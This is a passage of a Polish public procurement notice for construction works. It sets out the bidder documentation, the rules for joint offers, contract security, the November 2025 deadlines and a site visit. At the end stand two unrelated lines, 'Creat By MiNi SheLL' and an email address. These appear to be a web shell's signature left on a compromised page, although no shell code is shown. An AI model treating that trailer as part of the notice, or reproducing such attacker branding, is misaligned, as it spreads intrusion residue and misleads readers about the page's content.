Konfederacji Szwajcarskiej,zzastrzeżeniemart.12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane oraz ustawy z dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych <br/>w państwach członkowskich Unii Europejskiej.<br/>5.	Zamawiający nie określa szczególnego sposobu spełniania warunków określonych w pkt. 1,2 powyżej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co oznacza że warunki określone powyżej wykonawcy wspólnie ubiegający się o zamówienie mogą spełniać łącznie poprzez sumowanie . <br/>Powyższe zasady dotyczą również sytuacji, gdy Wykonawca będzie polegał <br/>na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp.<br/>6.	Wykonawca może w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych (dotyczy warunków udziału w postępowaniu określonych przez Zamawiającego w pkt. 1,2 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie aktual-nych na dzień złożenia następujących podmiotowych środków dowodowych: <br/>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których ro-boty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – wykaz robót stanowi załącznik nr 8 do SWZ ;<br/><br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami - wykaz robót stanowi załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty ( załącznik nr 1 do SWZ) należy dołączyć wypełnione, podpisane przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, formularze:<br/>1)	Oświadczenie Wykonawcy/Wykonawcy wspólnie ubiegającego się o zamówienie, <br/>o niepodleganiu wykluczeniu z postępowania – załącznik nr 3 do SWZ,<br/>2)	Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu <br/>z postępowania (o ile Wykonawca korzysta ze zdolności innych podmiotów na za-sadach określonych w art. 118 ustawy Pzp) – załącznik nr 3.1 do SWZ,<br/>3)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – załącznik nr 4 do SWZ<br/>4)	Oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu (o ile Wykonawca korzysta ze zdolności innych podmiotów<br/> na zasadach określonych w art. 118 ustawy Pzp) – załącznik nr 4.1 do SWZ<br/>5)	Zobowiązanie podmiotu udostępniającego zasoby (o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach określonych w art. 118 ustawy) – załącznik nr 6 do SWZ<br/>6)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp (jeżeli, dotyczy, dotyczy również wspólników spółki cywilnej) – załącznik nr 7 do SWZ<br/>7)	Przedmiotowe środki dowodowe, o których mowa w rozdziale IV pkt.8 SWZ ( jeżeli dotyczy)<br/>8)	Zgodnie z zapisami rozdziału VII SWZ - Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania.<br/>Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej, zamawiający oprócz dokumentu o którym mowa powyżej, wymaga od wykonawcy złożenia pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy <br/>Powyższe dotyczy również:<br/>a)	osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>b)	osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp<br/>9)	W przypadku złożenia oferty wspólnej pełnomocnictwo udzielone liderowi zgodnie z zapisami rozdziału IX SWZ oraz art. 58 ust.2 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy to wspólników spółki cywilnej i konsorcjum, jeżeli zakres i sposób reprezentacji spółki cywilnej<br/>wynika z dołączonej do oferty umowy spółki cywilnej lub uchwały wspólników, a w przypadku konsorcjum z umowy<br/>konsorcjum.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo –w przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej lub<br/>uchwały wspólników, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy<br/>konsorcjum.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ustawy Pzp (załącznik nr 3 i nr 4 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu, w zakresie którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>1) oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia;<br/>2) oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>7. W przypadku wniesienia wadium w postaci niepieniężnej, treść dokumentu wadialnego musi zapewniać możliwość<br/>zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować<br/>wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy Pzp , t.j. działania<br/>lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455ust. 1<br/>pkt 1 ustawy Pzp) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 5 do SWZ. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1<br/>pkt 2-4 oraz ust. 2 ustawy Pzp.<br/>Szczegółowe informacje zawiera SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami zgodnie ze sposobem przygotowania i składania ofert opisanym w rozdziale XIII SWZ, wyłącznie za pośrednictwem Platformy e-Zamówienia, za pośrednictwem zakładki „Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Z postępowania o udzielenie zamówienia wyklucza się również Wykonawcę w przypadkach, o których mowa w art.7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2025 poz. 514. ). Do Wykonawcy podlegającego wykluczeniu<br/>w tym zakresie, stosuje się art. 7 ust. 3 wspomnianej ustawy.<br/>2. Na podstawie art. 95 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, Zamawiający wymaga zatrudnienia przez Wykonawcę, Podwykonawcę lub dalszego Podwykonawcę osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie, na podstawie umowy o pracę. Wymóg ten dotyczy osób, które wykonują czynnościbezpośrednio związane z wykonywaniem robót, czyli tzw. pracowników fizycznych. Wymóg nie dotyczy więc, między innymi<br/>osób: kierujących budową, wykonujących obsługę geodezyjną, dostawców materiałów budowlanych.<br/>3. Ubezpieczenie. <br/>Wykonawca zobowiązany jest do posiadania przez cały okres realizacji robót <br/>budowlanych oraz przez okres 30 dni po podpisaniu przez Strony Protokołu odbioru końcowego robót, ważnej umowy ubezpieczenia odpowiedzialności cywilnej działalności gospodarczej. <br/>4.Wykonawca, którego oferta zostanie wybrana (uznana za najkorzystniejszą), zobowiązany jest przed zawarciem umowy w<br/>sprawie zamówienia publicznego, do wniesienia zabezpieczenia należytego wykonania umowy, w wysokości 5,00 % ceny<br/>całkowitej ( brutto) podanej w ofercie.<br/>5.Zamawiający ustala, że w dniu 23.10.2025 r. o godz. 13:30 na terenie siedziby Zamawiającego odbędzie się wizja lokalna, której celem będzie sprawdzenie przez Wykonawców miejsca oraz warunków związanych z realizacją przedmiotu zamówienia. Spotkanie uczestników wizji lokalnej rozpocznie się w Dziale Zamówień Publicznych i Zaopatrzenia – przed pok. 106 (Budynek Główny, parter).<br/>1)	Zamawiający sugeruje Wykonawcom zasadność uczestniczenia w wizji lokalnej, jednak nie nakłada na nich takiego obowiązku (uczestnictwo w wizji jest prawem, a nie obowiązkiem Wykonawców); <br/>2)	brak rozpoznania przedmiotu zamówienia w ramach wizji lokalnej nie będzie skutkował dyskwalifikacją oferty; <br/>3)	ryzyko związane np. z błędnym skalkulowaniem ceny lub niedoszacowaniem oferty <br/>z powodu braku udziału w wizji lokalnej w pełni obciąża Wykonawcę;<br/>4)	w związku z wyznaczeniem wizji lokalnej Zamawiający ustalił termin składania ofert dłuższy od minimalnego wymaganego przez ustawodawcę; <br/>5)	podczas wizji lokalnej nie będą udzielane żadne odpowiedzi dotyczące prowadzonego postępowania. Wykonawca ewentualne pytania dotyczące treści SWZ – jakie pojawią się po odbyciu wizji – powinien zgłosić Zamawiającemu w sposób opisany w SWZ. <br/>6. Zamawiający nie przewiduje możliwości ograniczenia liczby Wykonawców, których zaprosi do negocjacji.<br/>7.Na podstawie art. 257 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki <br/>publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostaną mu przyznane.<br/>8.	Zamawiający informuje, że zamówienie musi być zgodne z,Zasadą DNSH „Nie czyń poważnych szkód” (DNSH – Do No Significant Harm) - szczegółowe zapisy zawiera SWZ.<br/>9. Zamawiający nie wymaga wniesienia wadium.<br/>10. Informacja o możliwości złożenia oferty równoważnej została zawarta w SWZ.<br/>11. Szczegółowe informacje dotyczące postępowania zawarte są w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com